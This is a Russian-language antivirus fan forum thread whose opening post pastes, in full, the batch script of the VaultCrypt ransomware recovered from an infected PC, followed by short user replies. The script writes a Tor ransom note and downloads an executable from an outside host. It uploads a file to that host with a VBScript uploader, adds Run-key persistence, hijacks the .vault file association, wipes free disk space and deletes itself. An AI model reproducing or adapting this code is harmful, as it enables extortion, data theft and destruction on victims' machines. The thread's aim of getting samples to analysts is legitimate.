echo ^</script^>^</head^>^<body scroll="no"^>^<div class="vaustyle"^>^<div class="sc"^>Ваши документы и базы данных были зашифрованы и помещены в^<br^>^☢^ ^<b^>формат .VAULT^</b^>^ ^☢^</div^>^<div class="sc" style="font-size:20px;width:800px;margin-left:200px;color:#EAEAEA;"^>Для их восстановления необходимо получить ^<b^>Ваш ключ^</b^>^</div^>^<br^>^<div class="briefly"^>^<div class="bti"^>^<b^>Кратко:^</b^>^</div^>^<div class="sced"^>Необходимо произвести 3 шага:^<hr^> ^➠ Зайдите на наш веб-ресурс^<br^> ^Ⓑ Получите свой ключ^<br^>^⤷ ^<b^>Восстановите файлы^</b^>^</div^>^</div^>^<div class="detailed"^>^<div class="bti"^>^<b^>Детально:^</b^>^</div^>^<div class="sced"^>Скачайте ^<b^>Tor^</b^> браузер с оф. сайта ^<form action="https://dist.torproject.org/torbrowser/4.0.5/torbrowser-install-4.0.5_ru.exe"^>^<inputclass="dbutt" type="submit" value="⇣ Загрузить"^>^</form^>^<form action="http://torproject.org/projects/torbrowser.html.en#windows"^>^<input class="dbutt" type="submit" value="Help" style="padding-bottom:1px;"^>^</form^>^<hr^>Зайдите на наш сайт ^<b^>используя Tor^</b^>:^<br^>^<div class="bti" style="margin:1px 8%%;padding:0px;cursor:text;"^>http://restoredz4xpmuqr.onion^</div^>^<form action="http://pastebin.com/rs7jZ0TW"^>^<input class="dbutt" type="submit" value="Не работает?"^>^ ^⤴^</form^>^<hr^>^<div class="fnl"^>Авторизируйтесь ^ ^➤^  ^<b^>Прочитайте отзывы^</b^> ^ ^➤^  Ключ^</div^>^</div^>^<div class="footer"^>^<b^>Note 1:^</b^> Вы не сможете восстановить файлы без уникального ключа.^</div^>^<div class="footer"^>^<b^>Note 2:^</b^> Перед авторизацией, Вы ^<u^>должны^</u^> найти Ваш ^<b^>VAULT.KEY^</b^> на компьютере.^</div^>^<div class="footer"^>^<b^>Note 3: Стоимость полного восстановления на ресурсе не окончательная^</div^>^</div^>^</body^>^</html^>>> "%temp%\aceb2c042b18bf38.hta"
copy /y "%temp%\aceb2c042b18bf38.hta" "%appdata%\aceb2c042b18bf38.hta"
del /f /q "%temp%\440b0b96.cmd"
attrib +h "%appdata%\aceb2c042b18bf38.hta"
attrib +r +s "%temp%\VAULT.KEY"
attrib +r +s "%appdata%\VAULT.KEY"
attrib +r +s "%userprofile%\Desktop\VAULT.KEY"
:72fde7d3
echo do_vbsUpload > "%temp%\6387669a.vbs"
echo Sub do_vbsUpload^(^) >> "%temp%\6387669a.vbs"
echo Dim FileName,DestURL,FieldName >> "%temp%\6387669a.vbs"
echo FieldName="FileField" >> "%temp%\6387669a.vbs"
echo Dim aCounter,Arg >> "%temp%\6387669a.vbs"
echo aCounter=1 >> "%temp%\6387669a.vbs"
echo For Each Arg In WScript.Arguments >> "%temp%\6387669a.vbs"
echo Select Case aCounter >> "%temp%\6387669a.vbs"
echo Case 1: FileName=Arg >> "%temp%\6387669a.vbs"
echo Case 2: DestURL=Arg >> "%temp%\6387669a.vbs"
echo Case 3: FieldName=Arg >> "%temp%\6387669a.vbs"
echo End Select >> "%temp%\6387669a.vbs"
echo aCounter=aCounter+1 >> "%temp%\6387669a.vbs"
echo Next >> "%temp%\6387669a.vbs"
echo UploadFile DestURL,FileName,FieldName >> "%temp%\6387669a.vbs"
echo End Sub >> "%temp%\6387669a.vbs"
echo Sub UploadFile^(DestURL,FileName,FieldName^) >> "%temp%\6387669a.vbs"
echo Const Boundary="---------------------------0123456789012" >> "%temp%\6387669a.vbs"
echo Dim FileContents,FormData >> "%temp%\6387669a.vbs"
echo FileContents=GetFile^(FileName^) >> "%temp%\6387669a.vbs"
echo FormData=BuildFormData^(FileContents,Boundary,FileName,FieldName^) >> "%temp%\6387669a.vbs"
echo IEPostBinaryRequest DestURL,FormData,Boundary >> "%temp%\6387669a.vbs"
echo End Sub >> "%temp%\6387669a.vbs"
echo Function BuildFormData^(FileContents,Boundary,FileName,FieldName^) >> "%temp%\6387669a.vbs"
echo Dim FormData,Pre,Po >> "%temp%\6387669a.vbs"
echo Const ContentType="application/upload" >> "%temp%\6387669a.vbs"
echo Pre="--"+Boundary+vbCrLf+mpFields^(FieldName,FileName,ContentType^) >> "%temp%\6387669a.vbs"
echo Po=vbCrLf+"--"+Boundary+"--"+vbCrLf >> "%temp%\6387669a.vbs"
echo Const adLongVarBinary=205 >> "%temp%\6387669a.vbs"
echo Dim RS: Set RS=CreateObject^("ADODB.Recordset"^) >> "%temp%\6387669a.vbs"
echo RS.Fields.Append "b",adLongVarBinary,Len^(Pre^)+LenB^(FileContents^)+Len^(Po^) >> "%temp%\6387669a.vbs"
echo RS.Open >> "%temp%\6387669a.vbs"
echo RS.AddNew >> "%temp%\6387669a.vbs"
echo Dim LenData >> "%temp%\6387669a.vbs"
echo LenData=Len^(Pre^) >> "%temp%\6387669a.vbs"
echo RS^("b"^).AppendChunk^(StringToMB^(Pre^) ^& ChrB^(0^)^) >> "%temp%\6387669a.vbs"
echo Pre=RS^("b"^).GetChunk^(LenData^) >> "%temp%\6387669a.vbs"
echo RS^("b"^)="" >> "%temp%\6387669a.vbs"
echo LenData=Len^(Po^) >> "%temp%\6387669a.vbs"
echo RS^("b"^).AppendChunk^(StringToMB^(Po^) ^& ChrB^(0^)^) >> "%temp%\6387669a.vbs"
echo Po=RS^("b"^).GetChunk^(LenData^) >> "%temp%\6387669a.vbs"
echo RS^("b"^)="" >> "%temp%\6387669a.vbs"
echo RS^("b"^).AppendChunk^(Pre^) >> "%temp%\6387669a.vbs"
echo RS^("b"^).AppendChunk^(FileContents^) >> "%temp%\6387669a.vbs"
echo RS^("b"^).AppendChunk^(Po^) >> "%temp%\6387669a.vbs"
echo RS.Update >> "%temp%\6387669a.vbs"
echo FormData=RS^("b"^) >> "%temp%\6387669a.vbs"
echo RS.Close >> "%temp%\6387669a.vbs"
echo BuildFormData=FormData >> "%temp%\6387669a.vbs"
echo End Function >> "%temp%\6387669a.vbs"
echo Function IEPostBinaryRequest^(URL,FormData,Boundary^) >> "%temp%\6387669a.vbs"
echo Dim IE: Set IE=CreateObject^("InternetExplorer.Application"^) >> "%temp%\6387669a.vbs"
echo IE.Navigate URL,,,FormData,_ >> "%temp%\6387669a.vbs"
echo "Content-Type: multipart/form-data; boundary="+Boundary+vbCrLf >> "%temp%\6387669a.vbs"
echo do While IE.Busy >> "%temp%\6387669a.vbs"
echo Wait >> "%temp%\6387669a.vbs"
echo Loop >> "%temp%\6387669a.vbs"
echo On Error Resume Next >> "%temp%\6387669a.vbs"
echo IEPostBinaryRequest=IE.Document.body.innerHTML >> "%temp%\6387669a.vbs"
echo IE.Quit >> "%temp%\6387669a.vbs"
echo End Function >> "%temp%\6387669a.vbs"
echo Function mpFields^(FieldName,FileName,ContentType^) >> "%temp%\6387669a.vbs"
echo Dim MPtemplate >> "%temp%\6387669a.vbs"
echo MPtemplate="Content-Disposition: form-data; name=""{field}"";"+_ >> "%temp%\6387669a.vbs"
echo " filename=""{file}"""+vbCrLf+_ >> "%temp%\6387669a.vbs"
echo "Content-Type: {ct}"+vbCrLf+vbCrLf >> "%temp%\6387669a.vbs"
echo Dim Out >> "%temp%\6387669a.vbs"
echo Out=Replace^(MPtemplate,"{field}",FieldName^) >> "%temp%\6387669a.vbs"
echo Out=Replace^(Out,"{file}",FileName^) >> "%temp%\6387669a.vbs"
echo mpFields=Replace^(Out,"{ct}",ContentType^) >> "%temp%\6387669a.vbs"
echo End Function >> "%temp%\6387669a.vbs"
echo Function GetFile^(FileName^) >> "%temp%\6387669a.vbs"
echo Dim Stream: Set Stream=CreateObject^("ADODB.Stream"^) >> "%temp%\6387669a.vbs"
echo Stream.Type=1 >> "%temp%\6387669a.vbs"
echo Stream.Open >> "%temp%\6387669a.vbs"
echo Stream.LoadFromFile FileName >> "%temp%\6387669a.vbs"
echo GetFile=Stream.Read >> "%temp%\6387669a.vbs"
echo Stream.Close >> "%temp%\6387669a.vbs"
echo End Function >> "%temp%\6387669a.vbs"
echo Function StringToMB^(S^) >> "%temp%\6387669a.vbs"
echo Dim I,B >> "%temp%\6387669a.vbs"
echo For I=1 To Len^(S^) >> "%temp%\6387669a.vbs"
echo B=B ^& ChrB^(Asc^(Mid^(S,I,1^)^)^) >> "%temp%\6387669a.vbs"
echo Next >> "%temp%\6387669a.vbs"
echo StringToMB=B >> "%temp%\6387669a.vbs"
echo End Function >> "%temp%\6387669a.vbs"
echo Sub Wait^(^) >> "%temp%\6387669a.vbs"
echo On Error Resume Next >> "%temp%\6387669a.vbs"
echo End Sub >> "%temp%\6387669a.vbs"
echo var fp="%%temp%%\\",os="attached-email",WshShell=CreateObject^("WScript.Shell"^),fp=WshShell.ExpandEnvironmentStrings^(fp^);function CreateObject^(b^){return new ActiveXObject^(b^)}function dw^(b,d^){var c=new ActiveXObject^("MSXML2.XMLHTTP"^);c.open^("GET",b,0^);c.send^(^);new ActiveXObject^("Scripting.FileSystemObject"^);var a=new ActiveXObject^("ADODB.Stream"^);a.Open^(^);a.Type=1;a.Write^(c.ResponseBody^);a.Position=0;a.SaveToFile^(d,2^);a.Close^(^)}dw^("http://"+os+".com/v.vlt",""+fp+"04442bd2.exe"^); > "%temp%\d690e171.js"
wscript.exe //B //Nologo //T:120 "%temp%\d690e171.js"
if exist 04442bd2.exe (
"%temp%\04442bd2.exe" -f "%temp%\e6355ca8.47b1ab0c"
wscript.exe //B //Nologo //T:120 "%temp%\6387669a.vbs" "%temp%\e6355ca8.47b1ab0c" http://attached-email.com/v.phppf
del /f /q 04442bd2.exe
)
del /f /q "%temp%\d690e171.js"
del /f /q "%temp%\6387669a.vbs"
del /f /q "%temp%\e6355ca8.47b1ab0c"
attrib -h -s "%temp%\f44cf952.46ea399a"
del /f /q "%temp%\f44cf952.46ea399a"
del /f /q "%temp%\*.gpg"
del /f /q "%temp%\*.*xe"
echo Y|assoc .vault=40e9cfd9
echo Y|ftype "40e9cfd9"=mshta.exe vbscript:Execute^(^"msgbox ^"^" BLOCKED:^"^"^&vbNewLine^&^"^" %%1^"^"^&vbNewLine^&vbNewLine^&ChrW^(10139^)^&^"^" KEY PURCHASE: http://restoredz4xpmuqr.onion^"^"^&vbNewLine^&vbNewLine^&^"^"[accessible only via Tor Browser: http://torproject.org]^"^",16,^"^"VaultCrypt [Need to purchase key]^"^":close^"^)
echo Y|assoc "40e9cfd9"\DefaultIcon=%SystemRoot%\System32\shell32.dll,-48
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "b276ebf8" /t REG_SZ /f /d "mshta %appdata%\aceb2c042b18bf38.hta"
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "f4e4bf4e" /f
del /f /q "%temp%\fabac41c.js"
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "4323ae20" /f
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "5dd61003" /f
start mshta "%temp%\aceb2c042b18bf38.hta"
attrib -s -h "%temp%\f44cf952.46ea399a"
del /f /q "%temp%\f44cf952.46ea399a"
if exist "%systemroot%\system32\cipher.exe" (
FOR %%s IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :ef60c46d %%s
goto c43a2b20
:ef60c46d
cipher /w:%1:
goto:eof
:c43a2b20
echo 85ceb2b1
)
del /f /q %0
:85ceb2b1
 

 

 

 
на клиенте....то бишь ключ
не идет из инета...

%temp%\sv.css" svchost.exe является свободной утилитой pgp

gecsagen

gecsagen

Опубликовано
Опубликовано

И не лень ли в крипторах копаться?

Да и неужели кто-то ключ в тело виря вписывает?

Блииииин файл прикрепить можно...

  • Улыбнуло 1
billandrew

billandrew

Опубликовано
  • Автор
Опубликовано (изменено)

еще выложить файлы bat  и vbs полученные из данного вируса?

 

настораживает поздняя реакция лаборатории на последние угрозы


понял... лаборатории не интересно....

 

P.S. Дополнение .... все файлы получены методом простого запрета удалять фалы из профайла пользователя... после работы виря...

 

А чем занимается фан-клуб? Самосозерцанием? Или любованием продукта?

Изменено пользователем billandrew
  • Нет слов 2
thyrex

thyrex

Опубликовано
Опубликовано

Ну так и шлите в вирлаб. А это форум фан-клуба

Friend

Friend

Опубликовано
Опубликовано (изменено)

@billandrew,  по вашей теме: https://twitter.com/e_kaspersky_ru/status/586072594886991872  ?

Уже есть KES 10: http://support.kaspersky.ru/kes10wks

Есть вот такая занимательная статья: http://support.kaspersky.ru/10905и вот такие рекомендации http://support.kaspersky.ru/10952

Чем вы занимаетесь на работе? Давно должны быть в теме какие угрозы сейчас  популярны.

Изменено пользователем Friend
thyrex

thyrex

Опубликовано
Опубликовано

@Friend, если бы Вы внимательны были, то увидели бы, что в статье о совершенно ином шифровальщике речь

  • Согласен 1
gecsagen

gecsagen

Опубликовано
Опубликовано

Да и мы тут в большинстве своем "простые смертные" и подобных проблем не решаем.В вирлабе может давно все сделали,а Вы панику разводите.Есть у ЛК спец утилиты для расшифровки туда в базы добавляют.И такие продукты ЛК как KIS не любят пропускать шифровальщиков.Да и в windows 7/8 хорошие настройки безопасности.

Даже если вирлаб не реагирует-значит считает это нужным.

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Андрей 1971
      Подмена букв при наборе текста
      Автор Андрей 1971
      Добрый вечер.
      При наборе текста в ворд, эксель, запросе в интернет происходит  автозамена буквы/цифры на сочетание букв. Суммарно по двум цифрам и четырем буквам. Пример:
      Вместо и - "0ыст ", вместо р - "жмюоб", вместо ш - "пл.ьв", вместо г - "нжщ"
      Замена цифры семь на "ех9дэ", восемь на "\6=0зъ"
       
      Dr.Web CureIt проблему не устранил.
      При открытии программы несколько знаков печатает как положено, потом опять подмена знаков.
       
      Похоже, дети, когда играли, скачали плагин. В Автозагрузке не выявил. Драйвер клавиатуры обновил."
       
      Если кто-то сталкивался, подскажите как исправить. Обязательно ли переустанавливать систему.
       
      С уважением, Андрей.
       
    • DIMANDUC
      Какая погода в вашей местности?
      Автор DIMANDUC
      В общем, пришла весна, и зима по-тихоньку отступает. В кратце опишу, какая погода в нашем городе Ардатове:
       
      Солнце светит, правда иногда за тучи заходит. Недавно прошел снег, где-то сантиметров 10 насыпало. А так, ночью мороз, а утром гололед. Начиная приблизительно с 10 часов утра и до вечера снег повсюду начинает таять, становится липким. Вечером подмораживает опять. И так практически каждый день.
    • Матвей Лоуренс
      На вашем устройстве возникла проблема
      Автор Матвей Лоуренс
    • Алексей1977
      Шифровальщик, дал расширение ELPACO-team. Найден вирус HEUR:Trojan-Ransom.Win32.Mimic.gen
      Автор Алексей1977
      Добрый день! В принципе в заголовке все описал. Хотел поинтересоваться, был ли у кого положительный опыт в расшифровке этих файлов?
    • vishnevskiyy
      Некоторыми параметрами управляет ваша организация
      Автор vishnevskiyy
      Не могу избавиться от этой надписи: Некоторыми параметрами управляет ваша организация.
      Все решения подобной проблемы заблокированы в самих параметрах Windows.

×
×
  • Создать...